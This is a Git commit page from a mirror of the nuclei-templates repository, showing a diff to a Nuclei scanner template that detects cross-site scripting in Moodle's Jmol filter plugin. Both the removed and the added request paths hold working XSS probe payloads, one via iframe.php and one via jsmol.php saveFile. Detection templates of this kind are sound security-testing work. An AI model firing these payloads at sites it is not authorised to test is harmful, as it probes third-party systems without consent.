daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1993 from projectdiscovery/template-fix 

Fix for moodle-jitsi-plugin-xss
patch-1
Sandeep Singh 2021-07-14 16:14:54 +05:30 committed by GitHub
parent f7259df034 7e258fcae2
commit b3e1832d6b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
View File

@ -5,18 +5,26 @@ info:
author: madrobot author: madrobot
severity: medium severity: medium
description: Cross-site scripting on Moodle. description: Cross-site scripting on Moodle.
reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
tags: moodle,xss tags: moodle,xss
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- '\"};alert(1337);//' - "<script>alert('XSS')</script>"
part: body part: body
- type: word
part: header
words:
- "text/html"